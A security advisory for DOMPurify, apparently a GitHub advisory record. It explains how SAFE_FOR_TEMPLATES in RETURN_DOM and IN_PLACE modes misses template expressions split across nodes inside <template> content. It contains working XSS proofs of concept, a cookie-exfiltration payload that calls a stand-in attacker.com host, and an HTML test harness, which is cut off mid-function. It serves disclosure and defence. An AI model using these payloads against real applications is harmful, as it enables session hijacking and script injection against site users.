{"id":"GHSA-gvmj-g25r-r7wr","summary":"DOMPurify: SAFE_FOR_TEMPLATES bypass - template expressions survive sanitization inside \u003ctemplate\u003e content when using DOM output modes","details":"## Summary\n\nWhen DOMPurify is configured with both `SAFE_FOR_TEMPLATES: true` and `RETURN_DOM: true` (or `IN_PLACE: true`), an attacker can inject template expressions, such as `${evil}`, `{{evil}}`, or `\u003c%evil%\u003e`, that survive the sanitization pass inside `\u003ctemplate\u003e` element content. This bypasses the explicit purpose of `SAFE_FOR_TEMPLATES`, which is to prevent template engine evaluation of user-supplied content.\n\n\u003e **Note:** The string output path is **not** affected. Only the DOM return paths (`RETURN_DOM: true`, `RETURN_DOM_FRAGMENT: true`, `IN_PLACE: true`) are vulnerable.\n\n---\n\n## Description\n\n### Background\n\n`SAFE_FOR_TEMPLATES` is designed to strip `{{ }}`, `${ }`, and `\u003c% %\u003e` expressions from sanitized output so that downstream template engines do not evaluate user-controlled content. The feature operates through two mechanisms:\n\n1. **Per-node scrubbing** (`_sanitizeElements`, `src/purify.ts:1403`), scrubs individual text nodes during the main sanitization walk.\n2. **Final normalization pass** (`_scrubTemplateExpressions`, `src/purify.ts:1115`), calls `node.normalize()` to merge adjacent text nodes, then walks the merged nodes and strips any expressions that only appeared after merging.\n\n### The Gap\n\n`_scrubTemplateExpressions` uses a standard `NodeIterator` rooted at the output body:\n\n```ts\n// src/purify.ts:1117\nconst walker = createNodeIterator.call(\n  node.ownerDocument || node,\n  node,\n  NodeFilter.SHOW_TEXT | NodeFilter.SHOW_COMMENT | ...,\n  null\n);\n```\n\nPer the DOM specification, a `NodeIterator` does **not** descend into `\u003ctemplate\u003e.content`. The template element's content is a separate `DocumentFragment` that lives outside the normal child-node tree. For the same reason, `node.normalize()` (called on line 1116) also **does not** normalize text nodes inside `\u003ctemplate\u003e.content`.\n\nThis means the final normalization and scrub pass, the only pass that catches expressions formed *by merging split text nodes*, never runs on `\u003ctemplate\u003e` content.\n\n### How Split Text Nodes Are Created\n\nWhen DOMPurify removes a disallowed element with `KEEP_CONTENT: true` (the default), it moves the element's text children into the parent node. This is the standard code path at `src/purify.ts:1361–1373`:\n\n```ts\nif (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {\n  const parentNode = getParentNode(currentNode);\n  const childNodes = getChildNodes(currentNode);\n  if (childNodes && parentNode) {\n    for (let i = childCount - 1; i \u003e= 0; --i) {\n      const childClone = cloneNode(childNodes[i], true);\n      parentNode.insertBefore(childClone, getNextSibling(currentNode));\n    }\n  }\n}\n```\n\nIf the removed elements were adjacent siblings inside `\u003ctemplate\u003e` content, their extracted text nodes end up as **adjacent text nodes** in the template content fragment. Each individual text node is scrubbed by `_sanitizeElements`, but since `$` and `{evil}` do not match any expression regex on their own, neither is modified.\n\nThe code comment at `src/purify.ts:1100` explicitly acknowledges the threat class:\n\n\u003e *\"which only form after text-node normalization (e.g. fragments split across stripped elements) cannot survive into a template-evaluating framework.\"*\n\nThe implementation guards against this on the main body, but the guard is **not** applied to `\u003ctemplate\u003e` content.\n\n---\n\n## Proof of Concept\n\n### Why the Split Works\n\nThe bypass relies on splitting `${...}` across two adjacent custom elements so that neither fragment matches any DOMPurify regex on its own:\n\n| Fragment | Against `TMPLIT_EXPR` `/\\${[\\w\\W]*/g` | Against `MUSTACHE_EXPR` `/{{[\\w\\W]*\\|^[\\w\\W]*}}/g` | Result |\n|---|---|---|---|\n| `$` | Requires `${` - no `{` follows | No `{{` or `}}` | **Survives** |\n| `{alert(document.domain)}` | Requires leading `$` - absent | No `{{`, ends with single `}` not `}}` | **Survives** |\n| `${alert(document.domain)}` | Full match - would be stripped | - | Stripped if seen whole |\n\nDOMPurify only sees each fragment in isolation. It never merges them before checking, so the expression is never detected.\n\n---\n\n### PoC 1 - XSS via `alert()` (baseline confirmation)\n\n```javascript\n// Attacker input - splits \"${alert(document.domain)}\" across two custom elements.\n// Custom elements are not in DOMPurify's default ALLOWED_TAGS and are removed,\n// but their text content is kept (KEEP_CONTENT: true is the default).\nconst dirty =\n  '\u003ctemplate\u003e' +\n    '\u003cx-split-1\u003e$\u003c/x-split-1\u003e' +\n    '\u003cx-split-2\u003e{alert(document.domain)}\u003c/x-split-2\u003e' +\n  '\u003c/template\u003e';\n\n// Developer sanitizes with SAFE_FOR_TEMPLATES, trusting it strips ${...}\nconst sanitized = DOMPurify.sanitize(dirty, {\n  RETURN_DOM: true,\n  SAFE_FOR_TEMPLATES: true,\n});\n\n// Inspect what survived inside the \u003ctemplate\u003e\nconst tmpl = sanitized.querySelector('template');\nconsole.log([...tmpl.content.childNodes].map(n =\u003e n.nodeValue));\n// [\"$\", \"{alert(document.domain)}\"]  \u003c-- two separate text nodes, both \"clean\"\n\n// Frameworks (lit-html, Angular, custom renderers) routinely call normalize()\n// before reading template content. This merges the adjacent nodes:\ntmpl.content.normalize();\nconsole.log(tmpl.content.textContent);\n// \"${alert(document.domain)}\"  \u003c-- fully formed expression, past the sanitizer\n\n// Any template-literal evaluator now fires XSS:\nconst expr = tmpl.content.textContent;\nnew Function(`return \\`${expr}\\``)();\n// !! alert(document.domain) executes !!\n```\n\n---\n\n### PoC 2 - Session Hijacking via cookie exfiltration\n\n```javascript\n// Splits \"${document.location='//attacker.com/?c='+document.cookie}\"\n// \"{document.location=...}\" ends with a single \"}\" — does NOT match\n// MUSTACHE_EXPR's \"^[\\w\\W]*}}\" (requires double \"}}\"), so it survives.\nconst dirty =\n  '\u003ctemplate\u003e' +\n    '\u003cx-a\u003e$\u003c/x-a\u003e' +\n    '\u003cx-b\u003e{document.location=\"//attacker.com/?c=\"+document.cookie}\u003c/x-b\u003e' +\n  '\u003c/template\u003e';\n\nconst sanitized = DOMPurify.sanitize(dirty, {\n  RETURN_DOM: true,\n  SAFE_FOR_TEMPLATES: true,\n});\n\nconst tmpl = sanitized.querySelector('template');\ntmpl.content.normalize();\n\nconsole.log(tmpl.content.textContent);\n// \"${document.location=\"//attacker.com/?c=\"+document.cookie}\"\n\n// Template engine evaluates it - victim's browser makes the request:\nnew Function(`return \\`${tmpl.content.textContent}\\``)();\n// !! Redirects victim to attacker.com with their full cookie string !!\n// e.g. https://attacker.com/?c=session=abc123;auth_token=xyz789\n```\n\n---\n\n### PoC 3 - End-to-end: realistic application context\n\nThis shows the full path in an application that uses DOMPurify to sanitize user-submitted rich text before rendering it with a custom template engine:\n\n```html\n\u003c!-- index.html - the vulnerable application --\u003e\n\u003cdiv id=\"output\"\u003e\u003c/div\u003e\n\u003cscript type=\"module\"\u003e\n  import DOMPurify from './dist/purify.es.mjs';\n\n  // Simulates fetching and rendering user-submitted comment\n  async function renderComment(userHtml) {\n    // Developer correctly uses SAFE_FOR_TEMPLATES to protect the template engine\n    const dom = DOMPurify.sanitize(userHtml, {\n      RETURN_DOM: true,\n      SAFE_FOR_TEMPLATES: true,\n    });\n\n    // Application iterates \u003ctemplate\u003e elements and evaluates their content\n    // (common pattern in component-based frameworks)\n    dom.querySelectorAll('template').forEach(tmpl =\u003e {\n      tmpl.content.normalize(); // standard DOM housekeeping\n      const content = tmpl.content.textContent;\n\n      // Application uses template literals to interpolate user content into UI\n      const rendered = new Function('user', `return \\`${content}\\``)({ name: 'World' });\n      document.getElementById('output').innerHTML += rendered;\n    });\n  }\n\n  // Attacker-supplied comment content\n  const attackerComment =\n    '\u003ctemplate\u003e' +\n      '\u003cx-a\u003e$\u003c/x-a\u003e' +\n      '\u003cx-b\u003e{alert(\"XSS: \" + document.cookie)}\u003c/x-b\u003e' +\n    '\u003c/template\u003e';\n\n  // Developer believes SAFE_FOR_TEMPLATES makes this safe — it does not for RETURN_DOM\n  renderComment(attackerComment);\n  // !! XSS fires, alert pops with session cookies !!\n\u003c/script\u003e\n```\n\n**Observed output:** `alert(\"XSS: \" + document.cookie)` executes in the victim's browser context, leaking session tokens to the attacker.\n\n---\n\n### PoC 4 - `IN_PLACE` mode (DOM input path)\n\n```javascript\n// Applicable when the application sanitizes DOM nodes directly\n// (e.g., content loaded into an iframe or received from a WebSocket)\n\nconst container = document.createElement('div');\nconst tmpl = document.createElement('template');\n\n// Adjacent text nodes - these would never appear in HTML-parsed content,\n// but CAN appear in programmatically constructed DOM or WebSocket messages\n// that are deserialised into DOM nodes before sanitisation.\ntmpl.content.appendChild(document.createTextNode('$'));\ntmpl.content.appendChild(document.createTextNode('{alert(document.domain)}'));\ncontainer.appendChild(tmpl);\n\n// Sanitize in-place with SAFE_FOR_TEMPLATES - expected to strip all ${...}\nDOMPurify.sanitize(container, { IN_PLACE: true, SAFE_FOR_TEMPLATES: true });\n\n// Neither text node was modified - each passed the regex check individually\ncontainer.querySelector('template').content.normalize();\nconsole.log(container.querySelector('template').content.textContent);\n// \"${alert(document.domain)}\"  \u003c-- survived in-place sanitization\n\nnew Function(`return \\`${container.querySelector('template').content.textContent}\\``)();\n// !! XSS fires !!\n```\n\nHTML File for testing\n```HTML\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n  \u003cmeta charset=\"UTF-8\" /\u003e\n  \u003ctitle\u003eDOMPurify SAFE_FOR_TEMPLATES Bypass - PoC\u003c/title\u003e\n  \u003cscript src=\"dist/purify.js\"\u003e\u003c/script\u003e\n  \u003cstyle\u003e\n    * { box-sizing: border-box; margin: 0; padding: 0; }\n    body {\n      font-family: 'Segoe UI', system-ui, sans-serif;\n      background: #0d1117;\n      color: #e6edf3;\n      padding: 32px;\n    }\n    h1 { font-size: 1.4rem; color: #f85149; margin-bottom: 6px; }\n    .subtitle { color: #8b949e; font-size: 0.9rem; margin-bottom: 32px; }\n    .card {\n      background: #161b22;\n      border: 1px solid #30363d;\n      border-radius: 8px;\n      margin-bottom: 24px;\n      overflow: hidden;\n    }\n    .card-header {\n      display: flex;\n      align-items: center;\n      gap: 10px;\n      padding: 14px 20px;\n      border-bottom: 1px solid #30363d;\n      background: #1c2128;\n    }\n    .badge {\n      font-size: 0.72rem;\n      font-weight: 700;\n      padding: 2px 8px;\n      border-radius: 4px;\n      text-transform: uppercase;\n      letter-spacing: 0.05em;\n    }\n    .badge-run    { background: #1f6feb; color: #fff; }\n    .badge-pass   { background: #238636; color: #fff; }\n    .badge-fail   { background: #da3633; color: #fff; }\n    .badge-warn   { background: #9e6a03; color: #fff; }\n    .card-title   { font-size: 0.95rem; font-weight: 600; }\n    .card-body    { padding: 20px; }\n    label         { font-size: 0.78rem; color: #8b949e; display: block; margin-bottom: 6px; }\n    pre {\n      background: #0d1117;\n      border: 1px solid #30363d;\n      border-radius: 6px;\n      padding: 14px;\n      font-size: 0.82rem;\n      line-height: 1.6;\n      overflow-x: auto;\n      margin-bottom: 14px;\n      white-space: pre-wrap;\n      word-break: break-all;\n    }\n    pre.result    { border-color: #238636; background: #0a1a0f; }\n    pre.escaped   { border-color: #da3633; background: #1a0a0a; }\n    pre.highlight { border-color: #f85149; color: #f85149; font-weight: bold; }\n    .grid { display: grid; grid-template-columns: 1fr 1fr; gap: 14px; }\n    @media (max-width: 700px) { .grid { grid-template-columns: 1fr; } }\n    .arrow {\n      text-align: center;\n      font-size: 1.4rem;\n      color: #8b949e;\n      margin: 4px 0;\n    }\n    .xss-banner {\n      display: none;\n      background: #da3633;\n      color: #fff;\n      text-align: center;\n      padding: 16px;\n      font-size: 1.1rem;\n      font-weight: 700;\n      border-radius: 6px;\n      margin-bottom: 24px;\n      letter-spacing: 0.03em;\n    }\n    button {\n      background: #238636;\n      color: #fff;\n      border: none;\n      padding: 10px 22px;\n      border-radius: 6px;\n      font-size: 0.9rem;\n      font-weight: 600;\n      cursor: pointer;\n      margin-right: 10px;\n      margin-bottom: 8px;\n    }\n    button:hover { background: #2ea043; }\n    button.danger { background: #da3633; }\n    button.danger:hover { background: #f85149; }\n    .note {\n      background: #161b22;\n      border-left: 3px solid #9e6a03;\n      padding: 12px 16px;\n      font-size: 0.82rem;\n      color: #e3b341;\n      border-radius: 0 6px 6px 0;\n      margin-top: 14px;\n    }\n    #log {\n      background: #0d1117;\n      border: 1px solid #30363d;\n      border-radius: 6px;\n      padding: 14px;\n      font-size: 0.8rem;\n      font-family: monospace;\n      min-height: 60px;\n      max-height: 300px;\n      overflow-y: auto;\n      line-height: 1.8;\n    }\n    .log-ok   { color: #3fb950; }\n    .log-fail { color: #f85149; }\n    .log-info { color: #8b949e; }\n    .log-warn { color: #e3b341; }\n  \u003c/style\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\n  \u003ch1\u003e🔴 DOMPurify 3.4.7 - SAFE_FOR_TEMPLATES Bypass\u003c/h1\u003e\n  \u003cp class=\"subtitle\"\u003e\n    CVE candidate · Template expression injection via &lt;template&gt; content ·\n    Affects: \u003ccode\u003eRETURN_DOM + SAFE_FOR_TEMPLATES\u003c/code\u003e and \u003ccode\u003eIN_PLACE + SAFE_FOR_TEMPLATES\u003c/code\u003e\n  \u003c/p\u003e\n\n  \u003cdiv id=\"xss-banner\" class=\"xss-banner\"\u003e\n    ⚠️ XSS CONFIRMED - Expression executed in this page's context\n  \u003c/div\u003e\n\n  \u003c!-- ── Controls ─────────────────────────────────────────── --\u003e\n  \u003cdiv class=\"card\"\u003e\n    \u003cdiv class=\"card-header\"\u003e\n      \u003cspan class=\"badge badge-run\"\u003eControls\u003c/span\u003e\n      \u003cspan class=\"card-title\"\u003eRun individual test cases\u003c/span\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"card-body\"\u003e\n      \u003cbutton onclick=\"runAll()\"\u003e▶ Run all tests\u003c/button\u003e\n      \u003cbutton onclick=\"runPoC1()\"\u003ePoC 1 - alert()\u003c/button\u003e\n      \u003cbutton onclick=\"runPoC2()\"\u003ePoC 2 - cookie exfil\u003c/button\u003e\n      \u003cbutton onclick=\"runPoC3()\"\u003ePoC 3 - IN_PLACE\u003c/button\u003e\n      \u003cbutton onclick=\"runControl()\"\u003eControl - string output (should block)\u003c/button\u003e\n      \u003cdiv class=\"note\"\u003e\n        PoC 1 uses \u003ccode\u003econfirm()\u003c/code\u003e instead of \u003ccode\u003ealert()\u003c/code\u003e so the page\n        doesn't need a dismiss click to continue. Watch the red banner at the top.\n      \u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\n  \u003c!-- ── PoC 1 ─────────────────────────────────────────────── --\u003e\n  \u003cdiv class=\"card\" id=\"card-poc1\"\u003e\n    \u003cdiv class=\"card-header\"\u003e\n      \u003cspan class=\"badge badge-run\" id=\"badge-poc1\"\u003ePENDING\u003c/span\u003e\n      \u003cspan class=\"card-title\"\u003ePoC 1 - XSS via confirm() · RETURN_DOM mode\u003c/span\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"card-body\"\u003e\n      \u003cdiv class=\"grid\"\u003e\n        \u003cdiv\u003e\n          \u003clabel\u003eATTACKER INPUT - splits \u003ccode\u003e${\"{confirm(...)}\"}\u003c/code\u003e across two custom elements\u003c/label\u003e\n          \u003cpre id=\"input-poc1\"\u003e\u003c/pre\u003e\n        \u003c/div\u003e\n        \u003cdiv\u003e\n          \u003clabel\u003eAFTER DOMPurify.sanitize() - what survived in template.content\u003c/label\u003e\n          \u003cpre class=\"result\" id=\"nodes-poc1\"\u003e\u003c/pre\u003e\n        \u003c/div\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"arrow\"\u003e↓ template.content.normalize() ↓\u003c/div\u003e\n      \u003clabel\u003eMERGED TEXT NODE - fully formed expression after normalization\u003c/label\u003e\n      \u003cpre class=\"highlight\" id=\"merged-poc1\"\u003e\u003c/pre\u003e\n      \u003clabel\u003eEXECUTION RESULT\u003c/label\u003e\n      \u003cpre id=\"exec-poc1\"\u003eNot run yet\u003c/pre\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\n  \u003c!-- ── PoC 2 ─────────────────────────────────────────────── --\u003e\n  \u003cdiv class=\"card\" id=\"card-poc2\"\u003e\n    \u003cdiv class=\"card-header\"\u003e\n      \u003cspan class=\"badge badge-run\" id=\"badge-poc2\"\u003ePENDING\u003c/span\u003e\n      \u003cspan class=\"card-title\"\u003ePoC 2 - Cookie exfiltration · RETURN_DOM mode\u003c/span\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"card-body\"\u003e\n      \u003cdiv class=\"grid\"\u003e\n        \u003cdiv\u003e\n          \u003clabel\u003eATTACKER INPUT - exfil payload split across custom elements\u003c/label\u003e\n          \u003cpre id=\"input-poc2\"\u003e\u003c/pre\u003e\n        \u003c/div\u003e\n        \u003cdiv\u003e\n          \u003clabel\u003eINDIVIDUAL TEXT NODES after sanitization (each \"clean\")\u003c/label\u003e\n          \u003cpre class=\"result\" id=\"nodes-poc2\"\u003e\u003c/pre\u003e\n        \u003c/div\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"arrow\"\u003e↓ template.content.normalize() ↓\u003c/div\u003e\n      \u003clabel\u003eMERGED EXPRESSION - what a template engine would evaluate\u003c/label\u003e\n      \u003cpre class=\"highlight\" id=\"merged-poc2\"\u003e\u003c/pre\u003e\n      \u003clabel\u003eSIMULATED EXECUTION (fetch URL that would be called)\u003c/label\u003e\n      \u003cpre id=\"exec-poc2\"\u003eNot run yet\u003c/pre\u003e\n      \u003cdiv class=\"note\"\u003e\n        Real execution would redirect the victim to\n        \u003ccode\u003eattacker.com\u003c/code\u003e carrying the session cookie.\n        This PoC constructs the URL without actually sending it.\n      \u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\n  \u003c!-- ── PoC 3 ─────────────────────────────────────────────── --\u003e\n  \u003cdiv class=\"card\" id=\"card-poc3\"\u003e\n    \u003cdiv class=\"card-header\"\u003e\n      \u003cspan class=\"badge badge-run\" id=\"badge-poc3\"\u003ePENDING\u003c/span\u003e\n      \u003cspan class=\"card-title\"\u003ePoC 3 - XSS · IN_PLACE mode (DOM node input)\u003c/span\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"card-body\"\u003e\n      \u003cdiv class=\"grid\"\u003e\n        \u003cdiv\u003e\n          \u003clabel\u003eATTACKER PROVIDES - a DOM node with programmatically split text nodes\u003c/label\u003e\n          \u003cpre id=\"input-poc3\"\u003e\u003c/pre\u003e\n        \u003c/div\u003e\n        \u003cdiv\u003e\n          \u003clabel\u003eAFTER IN_PLACE sanitization - text nodes unchanged\u003c/label\u003e\n          \u003cpre class=\"result\" id=\"nodes-poc3\"\u003e\u003c/pre\u003e\n        \u003c/div\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"arrow\"\u003e↓ template.content.normalize() ↓\u003c/div\u003e\n      \u003clabel\u003eMERGED EXPRESSION\u003c/label\u003e\n      \u003cpre class=\"highlight\" id=\"merged-poc3\"\u003e\u003c/pre\u003e\n      \u003clabel\u003eEXECUTION RESULT\u003c/label\u003e\n      \u003cpre id=\"exec-poc3\"\u003eNot run yet\u003c/pre\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\n  \u003c!-- ── Control ───────────────────────────────────────────── --\u003e\n  \u003cdiv class=\"card\" id=\"card-ctrl\"\u003e\n    \u003cdiv class=\"card-header\"\u003e\n      \u003cspan class=\"badge badge-run\" id=\"badge-ctrl\"\u003ePENDING\u003c/span\u003e\n      \u003cspan class=\"card-title\"\u003eControl - string output (default) MUST block the payload\u003c/span\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"card-body\"\u003e\n      \u003clabel\u003eSame attacker input, but sanitized WITHOUT RETURN_DOM (string output path)\u003c/label\u003e\n      \u003cpre id=\"input-ctrl\"\u003e\u003c/pre\u003e\n      \u003cdiv class=\"arrow\"\u003e↓ DOMPurify.sanitize() - string path hits the regex scrub at line 2067 ↓\u003c/div\u003e\n      \u003clabel\u003eOUTPUT STRING - expression should be stripped\u003c/label\u003e\n      \u003cpre id=\"output-ctrl\"\u003eNot run yet\u003c/pre\u003e\n      \u003cdiv class=\"note\"\u003e\n        The string output path is NOT vulnerable because\n        \u003ccode\u003ebody.innerHTML\u003c/code\u003e serialises the template content into a\n        flat string where the full \u003ccode\u003e${\"{...}\"}\u003c/code\u003e expression is visible\n        and the final regex scrub catches it.\n      \u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\n  \u003c!-- ── Log ───────────────────────────────────────────────── --\u003e\n  \u003cdiv class=\"card\"\u003e\n    \u003cdiv class=\"card-header\"\u003e\n      \u003cspan class=\"badge badge-run\"\u003eLog\u003c/span\u003e\n      \u003cspan class=\"card-title\"\u003eTest output\u003c/span\u003e\n    \u003c/div\u003e\n    \u003cdiv class=\"card-body\"\u003e\n      \u003cdiv id=\"log\"\u003e\u003c/div\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\n\u003cscript\u003e\n// ── Helpers ────────────────────────────────────────────────────────────────\n\nlet xssConfirmed = false;\n\nfunction log(msg, type = 'info') {\n  const el = document.getElementById('log');\n  const line = document.createElement('div');\n  line.className = 'log-' + type;\n  line.textContent = '[' + new Date().toLocaleTimeString() + '] ' + msg;\n  el.appendChild(line);\n  el.scrollTop = el.scrollHeight;\n}\n\nfunction setBadge(id, status) {\n  const el = document.getElementById('badge-' + id);\n  el.textContent = status;\n  el.className = 'badge ' + {\n    PASS: 'badge-fail',   // \"PASS\" here means the attack succeeded (bad for security)\n    BLOCK: 'badge-pass',  // \"BLOCK\" means DOMPurify correctly blocked it\n    PENDING: 'badge-run',\n    ERROR: 'badge-warn',\n  }[status];\n}\n\nfunction markXSS(poc) {\n  if (!xssConfirmed) {\n    xssConfirmed = true;\n    document.getElementById('xss-banner').style.display = 'block';\n  }\n  log('🔴 XSS CONFIRMED in ' + poc + ' - expression executed in page context', 'fail');\n}\n\n// ── PoC 1: RETURN_DOM + alert ──────────────────────────────────────────────\n\nfunction runPoC1() {\n  log('Running PoC 1 - RETURN_DOM + confirm()...', 'info');\n\n  // IMPORTANT:\n  // Build a REAL template DOM node with split TEXT nodes.\n  // HTML parsing would merge adjacent text automatically,\n  // so we construct the DOM programmatically.\n\n  const container = document.createElement('div');\n  const tmpl = document.createElement('template');\n\n  tmpl.content.appendChild(document.createTextNode('$'));\n  tmpl.content.appendChild(\n    document.createTextNode(\n      '{confirm(\"XSS - DOMPurify SAFE_FOR_TEMPLATES bypass\\\\nExpression executed in: \" + document.domain)}'\n    )\n  );\n\n  container.appendChild(tmpl);\n\n  document.getElementById('input-poc1').textContent =\n    'template.content.childNodes[0].data = \"$\"\\\\n' +\n    'template.content.childNodes[1].data = \"{confirm(...)}\"';\n\n  // Sanitize the DOM node itself\n  const sanitized = DOMPurify.sanitize(container, {\n    RETURN_DOM: true,\n    SAFE_FOR_TEMPLATES: true,\n  });\n\n  const tmplAfter = sanitized.querySelector('template');\n\n  if (!tmplAfter) {\n    document.getElementById('exec-poc1').textContent =\n      'Template element removed during sanitization';\n    setBadge('poc1', 'ERROR');\n    return;\n  }\n\n  const nodesBefore = [...tmplAfter.content.childNodes].map(\n    n =\u003e JSON.stringify(n.nodeValue)\n  );\n\n  document.getElementById('nodes-poc1').textContent =\n    'childNodes[0].data = ' + nodesBefore[0] + '\\\\n' +\n    'childNodes[1].data = ' + nodesBefore[1] + '\\\\n\\\\n' +\n    '→ Neither fragment matched individually.';\n\n  log(\n    'PoC 1: Text nodes after sanitization: ' +\n    nodesBefore.join(', '),\n    'warn'\n  );\n\n  // Merge text nodes\n  tmplAfter.content.normalize();\n\n  const merged = tmplAfter.content.textContent;\n\n  document.getElementById('merged-poc1').textContent = merged;\n\n  log('PoC 1: After normalize() - merged text: ' + merged, 'warn');\n\n  try {\n    const result = new Function('return `' + merged + '`')();\n\n    document.getElementById('exec-poc1').textContent =\n      '✔ Expression executed successfully\\\\n' +\n      'Returned: ' + result;\n\n    setBadge('poc1', 'PASS');\n    markXSS('PoC 1');\n\n  } catch (e) {\n    document.getElementById('exec-poc1').textContent =\n      'Error: ' + e.message;\n\n    setBadge('poc1', 'ERROR');\n\n    log('PoC 1 error: ' + e.message, 'warn');\n  }\n}\n\n// ── PoC 2: cookie exfiltration ─────────────────────────────────────────────\n\nfunction runPoC2() {\n  log('Running PoC 2 - cookie exfiltration...', 'info');\n\n  // Fake cookie for demonstration\n  document.cookie = 'session=DEADBEEF_SECRET_TOKEN; path=/';\n\n  // IMPORTANT:\n  // Build REAL split text nodes programmatically.\n  // Do NOT rely on HTML parsing.\n\n  const container = document.createElement('div');\n  const tmpl = document.createElement('template');\n\n  tmpl.content.appendChild(document.createTextNode('$'));\n\n  tmpl.content.appendChild(\n    document.createTextNode(\n      '{document.location=\"//attacker.com/steal?c=\"+document.cookie}'\n    )\n  );\n\n  container.appendChild(tmpl);\n\n  document.getElementById('input-poc2').textContent =\n    'template.content.childNodes[0].data = \"$\"\\\\n' +\n    'template.content.childNodes[1].data = \"{document.location=...}\"';\n\n  // Sanitize DOM node\n  const sanitized = DOMPurify.sanitize(container, {\n    RETURN_DOM: true,\n    SAFE_FOR_TEMPLATES: true,\n  });\n\n  const tmplAfter = sanitized.querySelector('template');\n\n  if (!tmplAfter) {\n    document.getElementById('exec-poc2').textContent =\n      'Template element removed during sanitization';\n\n    setBadge('poc2', 'ERROR');\n\n    log('PoC 2: template element missing after sanitize()', 'warn');\n\n    return;\n  }\n\n  const nodes = [...tmplAfter.content.childNodes].map(\n    n =\u003e JSON.stringify(n.nodeValue)\n  );\n\n  document.getElementById('nodes-poc2').textContent =\n    'Node 0: ' + nodes[0] + '\\\\n' +\n    'Node 1: ' + nodes[1] + '\\\\n\\\\n' +\n    '→ Neither fragment individually matches template-expression regexes.';\n\n  log('PoC 2: Nodes after sanitize: ' + nodes.join(', '), 'warn');\n\n  // Merge adjacent text nodes\n  tmplAfter.content.normalize();\n\n  const merged = tmplAfter.content.textContent;\n\n  document.getElementById('merged-poc2').textContent = merged;\n\n  log('PoC 2: Merged expression: ' + merged, 'warn');\n\n  // Simulate framework evaluation\n  try {\n    new Function('return `' + merged + '`')();\n\n    const cookieValue = document.cookie;\n\n    const stealUrl =\n      '//attacker.com/steal?c=' +\n      encodeURIComponent(cookieValue);\n\n    document.getElementById('exec-poc2').textContent =\n      '✔ Expression successfully evaluated\\\\n\\\\n' +\n      'Would redirect victim to:\\\\n' +\n      stealUrl + '\\\\n\\\\n' +\n      'Cookie exposed:\\\\n' +\n      cookieValue;\n\n    setBadge('poc2', 'PASS');\n\n    markXSS('PoC 2');\n\n    log('PoC 2: Would exfiltrate cookie → ' + stealUrl, 'fail');\n\n  } catch (e) {\n    document.getElementById('exec-poc2').textContent =\n      'Error: ' + e.message;\n\n    setBadge('poc2', 'ERROR');\n\n    log('PoC 2 error: ' + e.message, 'warn');\n  }\n}\n// ── PoC 3: IN_PLACE mode ───────────────────────────────────────────────────\n\nfunction runPoC3() {\n  log('Running PoC 3 - IN_PLACE mode...', 'info');\n\n  // Build DOM node manually (simulates attacker-controlled DOM input,\n  // e.g. content parsed from a WebSocket message or an iframe)\n  const container = document.createElement('div');\n  const tmplEl = document.createElement('template');\n\n  // Two separate text nodes - HTML parser merges them, but programmatic\n  // DOM construction keeps them split. This is the IN_PLACE attack surface.\n  tmplEl.content.appendChild(document.createTextNode('$'));\n  tmplEl.content.appendChild(document.createTextNode('{confirm(\"XSS via IN_PLACE - domain: \" + document.domain)}'));\n  container.appendChild(tmplEl);\n\n  document.getElementById('input-poc3').textContent =\n    '// Programmatically constructed DOM node:\\n' +\n    'template.content.childNodes[0].data = \"$\"\\n' +\n    'template.content.childNodes[1].data = \"{confirm(\\\\\"XSS via IN_PLACE...\\\\\")}\"\\n\\n' +\n    '// Passed to DOMPurify.sanitize(container, { IN_PLACE: true, SAFE_FOR_TEMPLATES: true })';\n\n  // Sanitize IN_PLACE - SAFE_FOR_TEMPLATES should strip the expression\n  DOMPurify.sanitize(container, {\n    IN_PLACE: true,\n    SAFE_FOR_TEMPLATES: true,\n  });\n\n  const tmplAfter = container.querySelector('template');\n  const nodesAfter = [...tmplAfter.content.childNodes].map(n =\u003e n.nodeValue);\n  document.getElementById('nodes-poc3').textContent =\n    'childNodes[0].data = ' + JSON.stringify(nodesAfter[0]) + '\\n' +\n    'childNodes[1].data = ' + JSON.stringify(nodesAfter[1]) + '\\n\\n' +\n    '→ _scrubTemplateExpressions() did not enter template.content\\n' +\n    '→ Both nodes unchanged after sanitization.';\n\n  log('PoC 3: Nodes after IN_PLACE sanitize: ' + nodesAfter.map(n =\u003e JSON.stringify(n)).join(', '), 'warn');\n\n  tmplAfter.content.normalize();\n  const merged = tmplAfter.content.textContent;\n  document.getElementById('merged-poc3').textContent = merged;\n\n  log('PoC 3: Merged: ' + merged, 'warn');\n\n  try {\n    const result = new Function('return `' + merged + '`')();\n    document.getElementById('exec-poc3').textContent =\n      '✔ new Function() returned: ' + result + '\\n' +\n      'confirm() dialog shown. XSS confirmed via IN_PLACE mode.';\n    setBadge('poc3', 'PASS');\n    markXSS('PoC 3');\n  } catch (e) {\n    document.getElementById('exec-poc3').textContent = 'Error: ' + e.message;\n    setBadge('poc3', 'ERROR');\n    log('PoC 3 error: ' + e.message, 'warn');\n  }\n}\n\n// ── Control: string output must block ─────────────────────────────────────\n\nfunction runControl() {\n  log('Running control - string output path (should block)...', 'info');\n\n  const dirty =\n    '\u003ctemplate\u003e' +\n      '\u003cx-split-1\u003e$\u003c/x-split-1\u003e' +\n      '\u003cx-split-2\u003e{confirm(\"this should never fire\")}\u003c/x-split-2\u003e' +\n    '\u003c/template\u003e';\n\n  document.getElementById('input-ctrl').textContent = dirty;\n\n  // Default string output - NOT using RETURN_DOM\n  const sanitized = DOMPurify.sanitize(dirty, {\n    SAFE_FOR_TEMPLATES: true,\n    // RETURN_DOM intentionally omitted - string path is safe\n  });\n\n  document.getElementById('output-ctrl').textContent = sanitized;\n\n  const blocked = 